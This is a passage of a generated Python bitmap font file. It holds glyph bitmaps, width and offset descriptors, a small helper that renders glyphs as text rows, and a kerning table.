0x84, # O O
0x84, # O O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
)
descriptors = (
(1,0),# !
(4,16),# "
(11,32),# #
(7,64),# $
(14,80),# %
(10,112),# &
(1,144),# '
(4,160),# (
(4,176),# )
(7,192),# *
(9,208),# +
(2,240),# ,
(5,256),# -
(1,272),# .
(6,288),# /
(8,304),# 0
(5,320),# 1
(7,336),# 2
(7,352),# 3
(8,368),# 4
(7,384),# 5
(8,400),# 6
(7,416),# 7
(8,432),# 8
(8,448),# 9
(1,464),# :
(2,480),# ;
(8,496),# <
(9,512),# =
(8,544),# >
(6,560),# ?
(13,576),# @
(10,608),# A
(8,640),# B
(9,656),# C
(10,688),# D
(8,720),# E
(7,736),# F
(10,752),# G
(10,784),# H
(3,816),# I
(6,832),# J
(8,848),# K
(7,864),# L
(11,880),# M
(10,912),# N
(11,944),# O
(8,976),# P
(11,992),# Q
(9,1024),# R
(8,1056),# S
(9,1072),# T
(10,1104),# U
(9,1136),# V
(13,1168),# W
(8,1200),# X
(9,1216),# Y
(8,1248),# Z
(4,1264),# [
(6,1280),# \
(4,1296),# ]
(10,1312),# ^
(9,1344),# _
(2,1376),# `
(7,1392),# a
(8,1408),# b
(6,1424),# c
(8,1440),# d
(7,1456),# e
(5,1472),# f
(8,1488),# g
(8,1504),# h
(1,1520),# i
(4,1536),# j
(7,1552),# k
(1,1568),# l
(11,1584),# m
(8,1616),# n
(8,1632),# o
(8,1648),# p
(8,1664),# q
(5,1680),# r
(6,1696),# s
(5,1712),# t
(8,1728),# u
(7,1744),# v
(11,1760),# w
(7,1792),# x
(7,1808),# y
(6,1824),# z
(7,1840),# {
(1,1856),# |
(7,1872),# }
(10,1888),# ~
(6,1920),# °
)
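# --- Usage sketch (illustrative; not part of the generated font data). ---
# Each entry in `descriptors` is (width_px, byte_offset): the glyph's pixel
# width and its starting byte index in `bitmaps`. Each glyph row occupies
# ceil(width / 8) bytes, MSB-first, and there are `char_height` rows per
# glyph. `render_glyph` below is a hypothetical helper (not generated by the
# font tool) that decodes one glyph into 'O'/' ' pixel rows, matching the
# comments alongside the bitmap bytes above.

def render_glyph(ch, bitmaps, descriptors, start_char, char_height):
    """Yield each row of glyph `ch` as a string of 'O' (on) / ' ' (off) pixels."""
    width, offset = descriptors[ord(ch) - ord(start_char)]
    bytes_per_row = (width + 7) // 8
    for row in range(char_height):
        # Pack this row's bytes into one integer, leftmost pixel in the MSB.
        bits = 0
        for b in range(bytes_per_row):
            bits = (bits << 8) | bitmaps[offset + row * bytes_per_row + b]
        total_bits = bytes_per_row * 8
        yield ''.join('O' if bits & (1 << (total_bits - 1 - col)) else ' '
                      for col in range(width))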
kerning = (
(1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,),
(4,4,3,4,4,3,4,4,4,4,0,2,0,3,0,4,4,4,4,1,4,4,4,4,4,4,3,0,0,4,4,3,1,4,4,4,4,4,4,4,4,2,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,2,0,4,2,4,2,2,2,4,2,4,4,3,4,4,4,4,2,4,2,4,3,4,4,4,4,4,4,4,1,4,4,0,4,),
(11,11,10,11,11,10,11,11,9,10,8,9,8,10,8,11,9,10,10,8,11,11,10,11,11,11,10,8,10,10,10,10,9,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,10,11,10,10,10,10,10,11,10,8,9,2,10,10,11,10,10,10,11,10,11,11,10,11,11,11,11,10,11,10,11,10,11,11,11,11,11,11,11,8,11,8,10,11,),
(7,7,7,7,7,7,7,7,4,6,4,6,4,7,6,7,6,7,7,6,7,7,6,7,7,7,6,5,7,7,5,7,7,7,7,7,7,7,7,7,6,6,7,7,7,7,7,7,7,7,7,4,7,6,6,6,5,7,7,6,4,5,4,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,4,7,4,7,7,),
(14,11,14,14,13,14,13,14,11,11,14,13,14,14,13,14,13,14,14,14,14,14,13,14,13,14,13,14,14,14,12,14,14,14,14,14,14,14,14,14,13,13,14,14,14,14,14,14,14,14,14,11,14,12,13,13,11,14,14,12,11,13,5,12,14,14,14,14,14,13,14,14,14,11,14,14,14,14,14,14,14,14,14,13,14,13,13,13,13,14,14,14,11,14,12,),
(10,7,9,9,9,9,9,9,8,6,9,9,9,10,9,9,10,10,9,9,9,9,9,9,9,10,9,9,9,9,8,9,10,10,9,10,10,10,9,10,10,10,10,10,10,10,9,10,9,10,9,6,9,7,8,10,6,10,10,7,7,9,1,8,9,10,9,9,9,9,9,10,10,7,10,10,10,10,9,10,9,10,9,8,9,8,8,10,8,10,9,10,7,9,8,),
(1,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,1,0,1,),
(3,4,1,1,2,1,4,1,4,3,1,4,1,3,4,2,2,2,2,1,3,1,3,2,2,3,4,1,1,2,2,1,2,3,1,3,3,3,1,3,3,2,3,3,3,3,1,3,1,3,2,3,3,3,3,3,3,3,4,4,4,1,3,4,1,4,1,1,1,2,2,4,3,4,4,4,2,2,1,4,1,2,1,2,1,1,1,2,2,2,1,4,4,1,2,),
(4,4,4,4,4,4,4,4,1,4,4,3,4,4,3,4,3,4,4,4,4,4,3,4,4,4,3,4,4,4,3,4,4,4,4,4,4,4,4,4,3,3,4,4,4,4,4,4,4,4,4,2,4,3,3,3,2,4,4,3,1,4,2,2,4,4,4,4,4,4,4,4,4,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,),
(7,7,5,7,7,5,7,7,6,7,3,5,2,6,4,7,5,6,6,5,7,7,7,6,7,7,6,4,4,5,6,7,5,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,4,6,0,7,6,7,6,6,6,6,6,7,7,5,7,7,7,7,6,7,6,7,7,6,7,7,7,6,7,6,4,7,4,2,7,),
(9,5,7,8,8,8,8,9,6,5,9,7,9,8,6,9,7,5,5,9,5,9,6,8,8,8,7,9,5,5,6,9,7,9,9,9,9,9,9,9,8,4,9,9,9,9,9,9,9,9,5,5,9,7,8,6,5,6,9,7,6,5,0,7,7,9,9,9,9,8,9,9,9,6,9,9,9,9,9,9,9,9,9,8,9,8,8,7,8,6,9,9,4,8,5,),
(2,0,1,2,0,1,1,2,1,0,0,1,0,2,1,1,2,2,2,0,2,1,1,1,1,2,1,0,0,2,0,1,2,2,1,2,2,2,1,2,2,2,2,2,2,2,1,2,1,2,2,0,1,0,0,2,0,2,2,0,1,0,1,0,2,2,1,1,1,1,1,2,2,1,2,2,2,2,1,2,1,2,2,1,1,0,0,2,0,2,0,2,1,0,0,),
(5,1,3,4,4,4,4,5,2,0,5,3,5,4,2,5,3,1,0,5,0,5,2,4,4,4,3,5,0,0,2,5,3,5,5,5,5,5,5,5,4,0,5,5,5,5,5,5,5,5,1,1,5,3,4,2,1,2,5,3,2,0,0,3,3,5,5,5,5,4,5,5,5,2,5,5,5,5,5,5,5,5,5,4,5,4,4,3,4,2,5,5,0,4,0,),
(1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,),
(6,6,4,5,5,4,6,5,6,6,4,4,4,5,1,5,5,5,5,4,6,5,6,5,5,5,4,4,4,5,5,4,2,6,5,6,6,6,5,6,6,4,6,6,6,6,5,6,5,6,5,6,6,6,6,6,6,6,6,6,6,4,1,6,3,6,4,4,4,5,4,6,6,4,6,6,5,5,4,5,4,5,4,5,5,5,5,5,5,5,4,6,6,3,5,),
(8,8,8,8,8,8,8,8,6,8,8,6,8,7,6,8,8,7,7,8,8,8,6,8,8,8,7,8,8,8,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,7,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(5,3,4,4,3,3,4,4,3,3,3,4,3,5,4,3,5,5,4,3,4,3,4,3,4,5,4,3,3,3,3,4,5,5,3,5,5,5,3,5,5,5,5,5,5,5,3,5,3,5,4,3,3,3,3,5,3,5,5,3,2,3,0,3,4,5,3,3,3,4,3,5,5,2,5,5,5,5,3,5,3,5,4,3,3,3,3,5,3,5,3,5,2,3,3,),
(7,7,6,7,7,6,7,7,5,7,5,6,5,7,6,7,7,7,6,5,7,7,6,7,7,7,6,5,6,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,7,6,6,7,6,7,7,6,4,6,0,5,6,7,6,6,6,7,6,7,7,6,7,7,7,7,6,7,6,7,7,7,7,7,7,7,7,7,5,7,4,4,7,),
(7,7,7,7,7,7,7,7,5,6,6,5,6,6,5,7,7,6,6,7,7,7,5,7,7,7,6,6,7,7,6,7,6,7,7,7,7,7,7,7,6,5,7,7,7,7,7,7,7,7,7,5,7,6,6,6,6,6,7,6,4,5,0,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,6,7,4,7,7,),
(8,7,7,7,7,8,7,8,6,7,7,6,7,7,6,8,7,7,7,8,7,8,7,8,7,7,6,7,7,7,7,8,7,8,8,8,8,8,8,8,7,7,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,8,7,5,7,0,7,7,8,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,7,8,4,8,7,),
(7,7,7,6,6,7,7,7,6,7,7,5,7,6,5,7,5,6,6,7,7,7,7,7,6,6,5,7,7,6,6,7,6,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,4,6,0,7,7,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,6,7,7,4,7,6,),
(8,7,8,7,7,8,7,8,6,7,8,6,8,7,6,8,6,7,7,8,7,8,7,8,7,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,8,7,5,7,0,7,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,6,),
(7,7,5,6,7,6,7,6,6,7,4,5,4,6,3,6,6,7,7,4,7,6,7,6,6,6,5,4,5,6,7,5,4,7,6,7,7,7,6,7,7,5,7,7,7,7,6,7,6,7,6,7,7,7,7,7,7,7,7,7,4,5,0,7,4,7,5,5,5,6,5,7,7,5,7,7,6,6,5,6,5,6,5,6,6,6,6,6,6,6,4,7,4,4,7,),
(8,8,8,8,8,8,8,8,6,7,7,6,7,7,6,8,8,7,7,8,8,8,6,8,8,8,7,7,8,8,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,7,8,7,5,6,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,7,8,5,8,8,),
(8,8,8,8,8,8,8,8,6,8,8,6,8,7,6,8,8,7,7,8,8,8,6,8,8,8,7,8,8,8,7,8,7,8,8,8,8,8,8,8,7,5,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,6,8,7,5,8,0,6,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,5,8,8,),
(1,1,0,1,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,1,),
(2,2,1,2,2,1,2,2,1,2,0,1,0,2,1,2,2,2,2,0,2,2,1,2,2,2,1,0,0,2,0,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,0,2,1,1,2,0,2,2,1,1,1,1,0,2,2,1,1,1,2,1,2,2,1,2,2,2,2,1,2,1,2,2,2,2,2,2,2,2,2,0,2,1,0,2,),
(8,8,7,8,8,7,8,8,6,6,4,7,3,8,7,8,8,8,8,4,8,7,7,8,8,8,7,2,5,8,6,7,8,8,7,8,8,8,7,8,7,3,8,8,8,8,7,8,7,8,8,4,8,7,7,7,7,8,8,7,5,5,0,6,8,8,7,7,7,7,7,8,8,6,8,8,8,8,7,8,7,8,8,7,7,7,7,7,7,8,5,8,5,5,8,),
(9,5,9,9,9,9,8,9,6,6,5,7,4,8,7,9,7,7,7,8,4,9,7,9,9,8,7,8,9,6,7,9,8,9,9,9,9,9,9,9,8,4,9,9,9,9,9,9,9,9,8,5,9,7,8,7,6,7,9,7,6,9,0,7,9,9,9,9,9,8,9,9,9,6,9,9,9,9,9,9,9,9,9,8,9,8,8,7,8,7,7,9,6,9,8,),
(8,4,6,7,7,7,7,8,5,5,8,6,8,7,5,8,6,4,5,8,5,8,5,7,7,7,6,8,7,2,5,8,6,8,8,8,8,8,8,8,7,3,8,8,8,8,8,8,8,8,6,4,8,6,7,5,4,5,8,6,5,7,0,6,6,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,5,8,8,3,7,6,),
(6,6,5,6,6,5,6,6,4,6,4,4,4,5,3,6,6,5,5,4,6,6,4,6,6,6,5,4,5,6,5,6,4,6,6,6,6,6,6,6,5,3,6,6,6,6,6,6,6,6,6,4,6,5,5,5,5,4,6,5,3,5,0,4,5,6,5,5,5,6,5,6,6,5,6,6,6,6,5,6,5,6,6,6,6,6,6,6,6,6,4,6,3,3,6,),
(13,12,13,13,13,13,12,13,10,13,13,11,13,12,11,13,12,12,12,13,13,13,11,13,13,13,12,13,13,12,11,13,12,13,13,13,13,13,13,13,12,8,13,13,13,13,13,13,13,13,13,9,13,12,12,12,11,12,13,11,10,13,9,11,13,13,13,13,13,12,13,13,13,11,13,13,13,13,13,13,13,13,13,12,13,13,13,12,13,12,13,13,10,13,13,),
(10,7,9,10,8,9,9,10,8,8,8,9,8,10,9,9,10,10,10,9,10,9,9,9,9,10,9,8,9,10,8,9,10,10,9,10,10,10,9,10,10,10,10,10,10,10,9,10,9,10,10,6,9,7,8,10,6,10,10,6,7,8,1,8,10,10,9,9,9,9,9,10,10,7,10,10,10,10,9,10,9,10,10,9,9,8,8,10,8,10,8,10,7,9,8,),
(8,7,8,7,7,8,7,8,5,6,7,6,7,7,6,8,7,7,7,8,7,8,6,8,7,7,6,7,8,7,7,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,6,8,7,7,7,6,7,8,6,5,6,0,6,8,8,8,8,8,7,8,8,8,6,8,8,8,8,8,8,8,8,7,7,8,7,7,7,7,7,7,8,5,8,7,),
(9,9,8,9,9,8,9,9,7,8,5,8,4,9,8,8,8,9,9,4,9,8,8,8,8,9,8,2,1,9,9,8,9,9,8,9,9,9,8,9,8,8,9,9,9,9,8,9,8,9,9,8,9,9,9,8,8,9,9,8,6,6,0,8,9,9,8,8,8,8,8,9,9,6,9,9,9,9,8,9,8,9,9,8,8,6,7,8,6,9,6,9,6,1,9,),
(10,9,9,10,10,10,9,10,7,10,10,8,10,9,8,10,9,8,8,10,10,10,7,10,10,10,9,10,10,9,8,10,9,10,10,10,10,10,10,10,9,6,10,10,10,10,10,10,10,10,10,6,10,9,9,8,8,8,10,8,7,10,1,8,9,10,10,10,10,9,10,10,10,8,10,10,10,10,10,10,10,10,10,9,10,10,10,9,10,9,10,10,7,10,10,),
(8,8,7,8,8,6,8,8,7,8,4,7,3,8,7,8,8,8,7,7,8,8,8,6,8,8,7,7,8,3,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,5,8,0,8,7,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,8,7,8,6,8,5,6,7,),
(7,7,4,7,7,5,7,7,6,7,3,5,2,6,4,7,5,6,6,6,7,7,7,5,7,6,5,6,7,2,6,7,5,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,7,4,7,0,7,1,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,5,6,3,5,7,4,5,6,),
(10,10,10,10,10,10,10,10,8,9,10,9,10,10,9,10,9,10,10,10,10,10,9,10,9,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,9,9,10,10,10,10,10,10,10,10,10,9,10,10,10,9,9,10,10,9,7,7,1,9,10,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,9,9,10,10,10,7,10,10,),
(10,10,10,10,10,10,10,10,9,10,10,9,10,10,9,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(3,3,2,2,2,2,3,2,2,3,2,2,2,3,2,2,3,3,2,2,3,2,3,2,2,3,2,2,2,2,2,2,3,3,2,3,3,3,2,3,3,3,3,3,3,3,2,3,2,3,2,3,3,3,3,3,3,3,3,3,0,2,0,3,2,3,2,2,2,2,2,3,3,1,3,3,3,3,2,3,2,3,2,2,2,2,2,3,2,3,2,3,0,2,2,),
(6,6,6,6,6,6,6,6,5,6,6,5,6,6,5,6,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,3,6,0,6,6,6,6,6,6,6,6,6,6,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,3,6,6,),
(8,8,7,7,7,6,8,7,7,8,3,7,3,8,7,6,8,8,7,4,8,6,8,6,7,8,7,3,5,7,7,7,8,8,6,8,8,8,6,8,8,8,8,8,8,8,6,8,6,8,7,8,8,8,8,8,8,8,8,8,5,4,0,8,7,8,6,6,6,7,6,8,8,5,8,8,8,8,6,8,6,8,7,7,6,5,6,8,5,8,5,8,5,5,7,),
(7,3,6,6,4,5,6,6,5,1,1,6,2,7,6,5,7,7,6,1,6,5,6,5,6,7,6,1,1,1,5,6,7,7,4,7,7,7,4,7,7,7,7,7,7,7,4,7,4,7,6,3,5,3,4,7,3,7,7,3,4,1,0,5,6,7,5,5,5,6,5,7,7,4,7,7,7,7,5,7,5,7,6,5,5,4,5,7,4,7,4,7,4,1,1,),
(11,11,11,11,11,11,11,11,10,11,11,10,11,11,10,11,11,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,2,11,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,11,),
(10,10,10,10,10,10,10,10,9,10,10,9,10,10,9,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(11,11,11,11,11,11,11,11,8,11,11,9,11,10,9,11,10,10,10,11,11,11,9,11,11,11,10,11,11,10,10,11,10,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,8,11,10,10,9,9,10,11,10,8,11,2,9,11,11,11,11,11,11,11,11,11,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,8,11,11,),
(8,8,7,8,8,7,8,8,6,8,7,6,7,7,5,8,8,7,7,7,8,8,6,8,8,8,7,7,8,8,7,8,6,8,8,8,8,8,8,8,7,4,8,8,8,8,8,8,8,8,8,6,8,7,7,7,7,6,8,7,5,8,0,6,7,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,7,8,5,6,8,),
(11,11,11,11,11,11,11,11,11,11,11,11,11,10,11,11,10,10,10,11,11,11,9,11,11,11,11,11,11,10,10,11,10,11,11,11,11,11,11,11,10,8,11,11,11,11,11,11,11,11,11,8,11,10,10,9,9,10,11,10,11,11,7,9,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,),
(9,7,8,8,7,7,8,8,7,7,5,8,5,9,8,7,9,9,8,5,8,7,8,7,8,9,8,5,6,8,7,8,9,9,7,9,9,9,7,9,9,9,9,9,9,9,7,9,7,9,8,6,7,7,7,9,6,9,9,6,6,6,0,7,8,9,7,7,7,8,7,9,9,6,9,9,9,9,7,9,7,9,8,7,7,7,7,9,7,9,6,9,6,6,7,),
(8,8,8,7,8,8,8,8,6,7,7,6,7,7,6,8,6,8,8,8,8,8,7,8,7,7,6,7,8,7,8,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,7,8,8,8,7,7,7,8,7,5,5,0,7,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,7,7,8,7,7,6,7,7,7,8,5,8,8,),
(9,9,5,6,8,7,9,7,8,9,5,7,5,8,4,7,7,8,8,5,9,6,9,7,7,8,7,5,5,5,8,5,5,9,6,9,9,9,6,9,9,7,9,9,9,9,6,9,6,9,7,9,9,9,9,9,9,9,9,9,6,5,0,9,5,9,5,5,5,8,5,9,9,6,9,9,5,5,5,5,5,5,5,8,5,5,5,5,5,5,6,9,6,5,8,),
(10,10,10,10,10,10,10,10,9,10,10,8,10,9,8,10,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,9,10,10,10,10,10,10,10,10,8,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,1,10,10,10,10,10,10,10,10,10,10,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,7,10,10,),
(9,9,7,8,9,8,9,8,8,9,7,7,7,8,5,8,8,9,9,7,9,8,9,8,8,8,7,7,7,8,9,8,6,9,8,9,9,9,8,9,9,7,9,9,9,9,8,9,8,9,8,9,9,9,9,9,9,9,9,9,6,7,0,9,7,9,7,7,7,8,7,9,9,7,9,9,8,8,7,8,7,8,8,8,8,8,8,8,8,8,7,9,6,7,9,),
(13,13,11,12,13,12,13,12,12,13,12,11,12,12,10,12,12,13,13,12,13,12,13,12,12,12,11,12,12,12,13,12,11,13,12,13,13,13,12,13,13,11,13,13,13,13,12,13,12,13,12,13,13,13,13,13,13,13,13,13,10,12,4,13,11,13,12,12,12,12,12,13,13,11,13,13,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,13,10,11,13,),
(8,8,7,7,7,7,8,7,7,8,5,7,5,8,7,7,8,8,7,5,8,7,8,7,7,8,7,5,6,7,7,7,8,8,6,8,8,8,6,8,8,8,8,8,8,8,6,8,6,8,7,8,8,8,8,8,8,8,8,8,5,5,0,8,7,8,7,7,7,7,7,8,8,5,8,8,8,8,7,8,7,8,7,7,7,6,6,8,6,8,5,8,5,6,7,),
(9,9,6,7,8,7,9,7,8,9,5,7,5,8,4,8,8,8,8,5,9,7,9,8,8,8,7,5,6,8,8,7,5,9,7,9,9,9,7,9,9,7,9,9,9,9,7,9,7,9,8,9,9,9,9,9,9,9,9,9,6,6,0,9,5,9,6,6,6,8,6,9,9,6,9,9,7,7,6,7,6,7,6,8,7,7,7,7,7,7,6,9,6,5,8,),
(8,8,7,7,8,7,8,7,7,8,4,7,4,8,7,7,8,8,8,4,8,6,8,7,7,8,7,4,5,7,8,7,8,8,7,8,8,8,7,8,8,8,8,8,8,8,7,8,7,8,7,8,8,8,8,8,8,8,8,8,5,5,0,8,7,8,6,6,6,7,6,8,8,5,8,8,8,8,6,8,6,8,7,7,6,6,6,8,6,8,5,8,5,3,8,),
(3,4,1,1,1,1,4,1,4,1,1,4,1,3,4,1,1,1,1,1,1,1,1,1,1,3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,4,4,4,1,1,4,1,4,1,1,1,2,2,4,3,4,4,4,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,4,4,1,1,),
(5,2,4,5,3,4,5,5,6,3,3,6,3,5,6,4,5,5,5,4,5,4,4,4,4,5,6,3,4,5,3,4,5,5,4,5,5,5,4,5,5,5,5,5,5,5,4,5,4,5,5,1,4,2,3,5,1,5,6,1,6,3,6,4,5,5,4,4,4,4,5,5,5,6,5,5,5,5,4,6,4,5,5,4,4,3,3,5,4,5,3,6,6,4,3,),
(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,),
(10,8,7,10,10,8,9,10,7,9,6,8,5,9,7,10,8,7,8,9,9,10,6,8,10,9,8,9,10,7,7,10,8,10,10,10,10,10,10,10,9,5,10,10,10,10,10,10,10,10,9,6,10,8,9,7,7,6,10,8,7,10,1,8,8,10,10,10,10,9,10,10,10,7,10,10,10,10,10,10,10,10,10,9,10,9,9,8,9,8,8,10,6,8,9,),
(8,5,0,6,0,0,8,7,8,2,0,9,4,8,9,1,4,2,2,1,2,1,2,1,1,8,9,1,0,1,3,5,0,1,0,0,1,2,0,0,6,3,1,2,0,0,0,1,3,0,1,0,0,0,0,1,0,1,9,4,6,0,9,7,2,1,3,1,2,4,8,1,8,6,2,8,0,1,1,9,2,4,3,4,1,2,0,2,7,3,6,9,6,0,3,),
(2,2,0,0,2,1,2,1,1,1,0,0,0,1,0,1,0,2,2,0,2,0,1,1,1,1,0,0,0,0,2,0,0,2,1,2,2,2,1,2,1,0,2,2,2,2,1,2,1,2,1,1,2,2,2,1,1,1,2,1,1,0,0,1,0,2,0,0,0,1,0,2,2,0,2,2,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,2,1,0,2,),
(7,6,7,7,7,7,6,7,5,7,7,6,7,7,6,7,7,7,7,7,7,7,6,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,3,7,6,6,7,4,7,7,5,4,7,0,5,7,7,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,7,7,4,7,7,),
(8,6,8,8,8,8,7,8,5,7,8,6,8,7,6,8,6,7,7,8,7,8,6,8,8,7,6,8,8,7,6,8,7,8,8,8,8,8,8,8,7,6,8,8,8,8,8,8,8,8,7,4,8,6,7,7,5,7,8,6,5,8,0,6,8,8,8,8,8,7,8,8,8,5,8,8,8,8,8,8,8,8,8,7,8,7,7,6,7,7,8,8,5,8,7,),
(6,5,5,6,6,5,5,6,3,6,2,5,1,6,5,6,5,6,6,4,6,6,5,5,6,6,5,3,1,6,4,6,6,6,6,6,6,6,6,6,5,5,6,6,6,6,6,6,6,6,6,2,6,5,5,5,3,6,6,4,3,5,0,4,6,6,5,5,5,5,5,6,6,4,6,6,6,6,5,6,5,6,6,5,6,6,6,5,6,6,3,6,3,1,6,),
(8,8,8,8,8,8,8,8,8,8,8,7,8,8,7,8,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,0,8,8,8,8,8,8,8,8,8,8,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,),
(7,5,6,7,7,7,6,7,4,6,7,6,7,7,6,7,6,7,7,7,7,7,6,7,7,7,6,7,7,7,5,7,7,7,7,7,7,7,7,7,6,6,7,7,7,7,7,7,7,7,7,3,7,5,6,6,4,7,7,5,4,7,0,5,7,7,7,7,7,6,7,7,7,4,7,7,7,7,7,7,7,7,7,6,7,6,6,6,6,7,7,7,4,7,6,),
(4,5,3,4,4,3,5,4,5,3,2,3,2,4,1,4,2,2,2,2,4,4,2,4,4,4,3,2,2,3,2,3,2,4,4,4,4,4,4,4,3,2,4,4,4,4,4,4,4,4,4,2,4,3,3,2,2,2,5,5,5,2,0,5,2,5,2,2,2,4,2,5,4,3,5,5,4,4,2,4,2,4,3,4,4,4,4,4,4,4,2,5,5,2,4,),
